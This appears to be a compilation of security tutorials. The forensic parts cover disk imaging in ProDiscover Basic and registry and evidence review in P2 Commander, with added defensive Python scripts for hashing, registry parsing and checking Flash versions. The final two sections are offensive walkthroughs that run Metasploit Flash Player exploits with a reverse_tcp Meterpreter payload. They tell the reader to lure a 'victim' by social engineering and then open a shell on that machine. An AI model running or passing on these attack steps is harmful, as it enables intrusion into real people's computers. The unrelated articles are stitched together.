How to gather Forensics Investigation Evidence using ProDiscover Basic

The ARC Group ProDiscover® Basic edition is a self-managed tool for the examination of your hard disk security. ProDiscover Basic is designed to operate under the National Institute of Standards’ Disk Imaging Tool Specification 3.1.6 to collect snapshots of activities that are critical to taking proactive steps in protecting your data.
ProDiscover Basic has a built-in reporting tool to present findings as evidence for legal proceedings. You gather time zone data, drive information, Internet activity, and more, piece by piece, or in a full report as needed. You have robust search capabilities for capturing unique data, filenames and filetypes, data patterns, date ranges, etc. ProDiscover Basic gives clients the autonomy they desire in managing their own data security.
At the ARC Group, we provide the tools you need to identify security issues before they escalate, and we use ProDiscover solutions to maintain your corporate safety and preserve your data. With ProDiscover Basic, professional consultants, system administrators, and investigators take the upper hand to manage cyber security at every level and protect information in the case of impending legal actions.

First, download ProDiscover Basic from here and install it on the PC. Enter the Project Number, Project File Name and Description in ProDiscover Basic, then click Open.


In the main window, click on Capture & Add Image.


Now select the source drive to capture; this can be a USB drive or a physical drive. In my case I select Physical Drive 1, which is my USB drive.

Now set the destination where the image file will be stored. In my case I used the E: drive, named the image folder pd, and named the image file to be saved in that folder PD.EVE.

Now enter the ‘Technician Name’, ‘Image Number’ and ‘Description’, then click OK.


After completing these steps, the following window will appear.


After imaging the drive, close ProDiscover; it will ask you to save your project.


Now start ProDiscover again, click on Open Project, browse to your project image, select it and click Open.


Now the project will open. Go to the left menu and click on Content View; it will show you all the contents of the evidence image.


To generate the automatic report, click on the Report tab under the View menu. It will show you the Evidence Report.
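The imaging steps above produce PD.EVE but say nothing about proving later that the file is unchanged, which is what an Evidence Report is ultimately asked to support. The following Python script is an added example, not part of the original article and not ProDiscover's own code: it hashes an image in chunks, writes a small JSON manifest beside it carrying the technician name and image number entered above, and re-verifies the image against that manifest. The `demo()` function builds a constructed stand-in image in a temporary directory so the script runs offline; the manifest layout and file names are my own choices.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK_SIZE = 1024 * 1024  # read 1 MiB at a time so multi-GB images never sit in memory


def hash_file(path, algorithm="sha256"):
    """Hash a file in fixed-size chunks and return the hex digest."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK_SIZE), b""):
            digest.update(block)
    return digest.hexdigest()


def write_manifest(image_path, technician, image_number, description=""):
    """Record size, SHA-256 and MD5 of the image in a JSON file next to it.
    The manifest layout is a hypothetical one chosen for this example."""
    record = {
        "image": os.path.basename(image_path),
        "size_bytes": os.path.getsize(image_path),
        "sha256": hash_file(image_path, "sha256"),
        "md5": hash_file(image_path, "md5"),
        "technician": technician,
        "image_number": image_number,
        "description": description,
        "hashed_utc": datetime.now(timezone.utc).isoformat(),
    }
    manifest_path = image_path + ".manifest.json"
    with open(manifest_path, "w", encoding="utf-8") as fh:
        json.dump(record, fh, indent=2)
    return manifest_path


def verify_image(image_path, manifest_path):
    """Return True only if both the size and the SHA-256 still match the manifest."""
    with open(manifest_path, encoding="utf-8") as fh:
        record = json.load(fh)
    if os.path.getsize(image_path) != record["size_bytes"]:
        return False
    return hash_file(image_path, "sha256") == record["sha256"]


def demo():
    """Constructed run: hash a stand-in image, verify it, then detect a one-byte change.
    Returns (verified_before, verified_after_tamper, sha256_of_empty_file)."""
    with tempfile.TemporaryDirectory() as workdir:
        image = os.path.join(workdir, "PD.EVE")
        with open(image, "wb") as fh:
            fh.write(bytes(range(256)) * 4096)  # constructed 1 MiB of sample data
        manifest = write_manifest(image, technician="Raj", image_number="1",
                                  description="USB drive image")
        before = verify_image(image, manifest)
        with open(image, "r+b") as fh:  # flip one byte in the middle of the image
            fh.seek(512 * 1024)
            fh.write(b"\xff")
        after = verify_image(image, manifest)
        empty = os.path.join(workdir, "empty.bin")
        open(empty, "wb").close()  # known-answer check: SHA-256 of an empty file
        return before, after, hash_file(empty)


if __name__ == "__main__":
    print(demo())  # expected: (True, False, 'e3b0c442...b855')
```

Hash the image once immediately after acquisition and again before every examination session; a size check first is cheap and catches truncated copies without re-reading the whole file.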


How to study Forensics Evidence of PC using P2 Commander (Part 1)

Now we are studying the forensic evidence that we collected in the previous article.

If you are interested in seeing how the forensic evidence was collected, please click on the link below.




First of all, we will look into the Trash folder (which contains the files and folders deleted by the user but not yet permanently erased from the system).


Clicking on the Trash folder shows the different files and folders with their Creation Time, Last Access Time, Last Change Time, and File Size.


Now click on Advanced Registry and System Analyzer and then the Auto Run option.
Go to the Run option. It will show all the programs that run automatically when the system boots.


Now select the OS Info option. Through OS Info, we can see the Root Path, Current Version, Registered User, Product ID, Edition ID, and Installation Type.

Now select the Uninstall option under Programs. The Uninstall option shows all the programs installed on the system.


To see the services running on the system, select the Services option.

Now click on Known DLLs to see the Dynamic Link Libraries (which contain data and code used by different programs simultaneously).


Now, to get information about the removable disks used recently or in the past, first click on USB Storage and then select USBSTOR. It will show the names of the disks.


Now select any one of the disks and it will show us its size as well as the manufacturer name.


To see the history of the most recently used commands entered in the Run box on the Start menu, click on the Users Info option. Select a user; in my case we are selecting Raj. Now click on RunMRU.

To see the user's web activity, click on TypedURLs, which will show the recently visited web sites.
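The USBSTOR, RunMRU and TypedURLs views above are P2 Commander's rendering of three registry keys. To show what the tool is reading, the following Python script is an added example, not part of the original article and not P2 Commander's own code: it parses a `.reg` text export of those keys (a constructed sample is embedded), lists USB storage devices with vendor, product, revision and instance ID, orders the RunMRU commands by the MRUList value (most recent first) and sorts TypedURLs by their numbered value names. Only REG_SZ string values are handled; the key paths are the standard Windows locations, and every device, command and URL in the sample is invented.

```python
import re
from collections import OrderedDict

# Constructed sample: what a `reg export` of the three keys looks like as text.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.00\4C530001234567890123&0]
"FriendlyName"="SanDisk Cruzer Blade USB Device"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="cmd\\1"
"b"="regedit\\1"
"c"="notepad\\1"
"MRUList"="cab"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url2"="http://intranet.example.test/"
"url1"="http://www.example.com/"
'''

# "name"="value" with .reg escaping (\" and \\) allowed inside either side
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
USBSTOR_RE = re.compile(
    r'\\Enum\\USBSTOR\\Disk&Ven_([^&]*)&Prod_([^&]*)&Rev_([^\\]*)\\([^\\]+)$',
    re.IGNORECASE)


def _unescape(text):
    """Undo the two escapes .reg files use in string values."""
    return text.replace(r'\"', '"').replace('\\\\', '\\')


def parse_reg_export(reg_text):
    """Parse .reg text into {key_path: {value_name: string_value}}.
    Only string values are kept; hex(...) binary values are skipped."""
    keys = OrderedDict()
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def usb_devices(keys):
    """Every USBSTOR device instance key, split into vendor/product/revision/instance."""
    devices = []
    for path, values in keys.items():
        m = USBSTOR_RE.search(path)
        if m:
            devices.append({
                'vendor': m.group(1), 'product': m.group(2), 'revision': m.group(3),
                'instance_id': m.group(4),  # serial number, or a Windows-generated ID
                'friendly_name': values.get('FriendlyName', ''),
            })
    return devices


def run_mru(keys):
    """RunMRU commands, most recent first, in the order given by the MRUList value."""
    for path, values in keys.items():
        if path.lower().endswith(r'\explorer\runmru'):
            commands = []
            for slot in values.get('MRUList', ''):
                cmd = values.get(slot)
                if cmd is None:
                    continue
                if cmd.endswith('\\1'):  # Explorer appends "\1" to every entry
                    cmd = cmd[:-2]
                commands.append(cmd)
            return commands
    return []


def typed_urls(keys):
    """TypedURLs values url1, url2, ... sorted by their number (url1 is the newest)."""
    for path, values in keys.items():
        if path.lower().endswith(r'\internet explorer\typedurls'):
            numbered = []
            for name, url in values.items():
                m = re.fullmatch(r'url(\d+)', name, re.IGNORECASE)
                if m:
                    numbered.append((int(m.group(1)), url))
            return [url for _, url in sorted(numbered)]
    return []


def summarize(reg_text):
    keys = parse_reg_export(reg_text)
    return {'usb_devices': usb_devices(keys), 'run_mru': run_mru(keys),
            'typed_urls': typed_urls(keys)}


if __name__ == '__main__':
    for section, items in summarize(SAMPLE_REG).items():
        print(section, items)
```

A real export written by `reg export` is UTF-16LE with a byte-order mark, so read such a file with `encoding="utf-16"` before handing its text to `summarize`. On a live system the RunMRU and TypedURLs keys sit in the logged-on user's hive; in a disk image they are in that user's NTUSER.DAT, which is why the tool asks you to pick a user (Raj above) first.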

Author: Mukul Mohan is a Microsoft Certified System Engineer in security and messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT technical trainer with over 20 years’ technical training experience, he can be contacted at mukul@ignitetechnologies.in

How to Collect Forensics Evidence of PC using P2 Commander (Part 1)

P2C is a comprehensive digital investigation tool with over ten years of court-approved use by forensic examiners. An integrated database and true multi-threading mean faster processing. P2C was built on Paraben's trusted email examination tools for unparalleled network email and personal email archive analysis. Advanced features include Data Triage analysis, Xbox analysis and pornography detection.


First, download P2 Commander from here, install it on the victim PC and open it. Click New Case; the ‘Create a New Case’ page will open.


Then click Next to proceed to the next step.


In the next step, enter the case name and DEMO details, then click Finish to proceed to the next step.


In the next step, enter the Investigator name and email details, then click Finish to proceed to the next step.


Now click ‘Add Evidence’ -> choose ‘Image File’.
Now select the Auto-detect Image option from Source Type, which will add the image evidence in any format. You can also choose any of the other available options, such as Drive Image or FAT Partition Image.


Now load the evidence disk image.

To learn how to create a disk image, read this article.


After selecting the evidence image, click on Open.


Now you will see that the case Demo has been created; it shows the directory hierarchy of the evidence image.


Now you can click on any directory of the evidence image and it will show all the files and sub-folders within that folder, with their file name, file type, file size, creation time, last modification time, etc.


Now click on the Generate Report tab.


Select the report type to be generated; in my case I am selecting HTML Investigative Report. Select the destination folder, then click Next.


Now select the sorted files to be added, by their file types, by clicking on the Add and Export button. Then click Next to proceed further.


Now click Finish to proceed to the next step.


The report file will be saved in your destination folder. Now you can view the details of your report.



Hack Remote Windows PC using Adobe Flash Player domainMemory ByteArray Use After Free

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker by forcing a reallocation (copying more contents than the original capacity), but Flash forgets to update the domainMemory pointer, leading to a use-after-free when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Exploit Targets
Flash 17.0.0.134

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/browser/adobe_flash_domain_memory_uaf
msf exploit (adobe_flash_domain_memory_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_domain_memory_uaf)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (adobe_flash_domain_memory_uaf)>set srvhost 192.168.1.7
msf exploit (adobe_flash_domain_memory_uaf)>set uripath /
msf exploit (adobe_flash_domain_memory_uaf)>exploit  


Now give the following URL to your victim: http://192.168.1.7:8080

Send the link of the server to the victim via chat, email or any social engineering technique.
When the victim opens the link (http://192.168.1.7:8080), a session will be opened as shown below.



Now type sessions -l to display the sessions opened when the victim opened the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Hack Remote Windows PC using Adobe Flash Player NetConnection Type Confusion

This module exploits a type confusion vulnerability in the NetConnection class in Adobe Flash Player. When using a correct memory layout, this vulnerability allows arbitrary memory to be corrupted. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.

Exploit Targets
Flash 16.0.0.305

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/browser/adobe_flash_net_connection_confusion
msf exploit (adobe_flash_net_connection_confusion)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_net_connection_confusion)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (adobe_flash_net_connection_confusion)>set srvhost 192.168.1.7
msf exploit (adobe_flash_net_connection_confusion)>set uripath /
msf exploit (adobe_flash_net_connection_confusion)>exploit


Now give the following URL to your victim: http://192.168.1.7:8080

Send the link of the server to the victim via chat, email or any social engineering technique.
When the victim opens the link (http://192.168.1.7:8080), a session will be opened as shown below.


Now type sessions -l to display the sessions opened when the victim opened the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
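The two modules above each name the Flash build they were tested against (17.0.0.134 and 16.0.0.305). From the defender's side the useful question is which machines still run a build no newer than those. The following Python snippet is an added example, not part of the original article and not Metasploit code: it parses Flash version strings in the forms the plug-in reports them (dotted, comma-separated, or the `WIN 17,0,0,134` form of `Capabilities.version`) and flags hosts whose build is at or below a tested build. The inventory lines are constructed, and treating every build at or below the tested one as exposed is a simplifying assumption for this check, not a statement of which builds Adobe actually fixed.

```python
import re

# Builds named in the two module descriptions above (values taken from the page).
TESTED_BUILDS = {
    "adobe_flash_domain_memory_uaf": (17, 0, 0, 134),
    "adobe_flash_net_connection_confusion": (16, 0, 0, 305),
}

VERSION_RE = re.compile(r"(\d+)[.,](\d+)[.,](\d+)[.,](\d+)")


def parse_flash_version(text):
    """Return (major, minor, build, patch) from '17.0.0.134', '17,0,0,134' or 'WIN 17,0,0,134'."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError("no Flash version found in %r" % text)
    return tuple(int(part) for part in m.groups())


def exposed_modules(version_text):
    """Modules whose tested build is at or above the installed build.
    Assumption for this check: a build no newer than the tested one is not fixed."""
    installed = parse_flash_version(version_text)
    return sorted(name for name, tested in TESTED_BUILDS.items() if installed <= tested)


def scan_inventory(lines):
    """Map host -> exposed modules for 'host,version' lines.
    Hosts whose version cannot be parsed are listed under 'unparsed' for manual review."""
    report = {"unparsed": []}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, _, version = line.partition(",")  # version may itself contain commas
        try:
            hits = exposed_modules(version)
        except ValueError:
            report["unparsed"].append(host)
            continue
        if hits:
            report[host] = hits
    return report


# Constructed inventory, in the shape of a software-inventory CSV export.
SAMPLE_INVENTORY = """
# host,flash_version
ws-01,WIN 17,0,0,134
ws-02,16.0.0.305
ws-03,18.0.0.160
ws-04,not installed
"""

if __name__ == "__main__":
    for host, modules in scan_inventory(SAMPLE_INVENTORY.splitlines()).items():
        print(host, modules)
```

With the sample inventory, ws-01 is flagged for the domainMemory module only, ws-02 for both, ws-03 for neither, and ws-04 lands in the unparsed list because no version string was found.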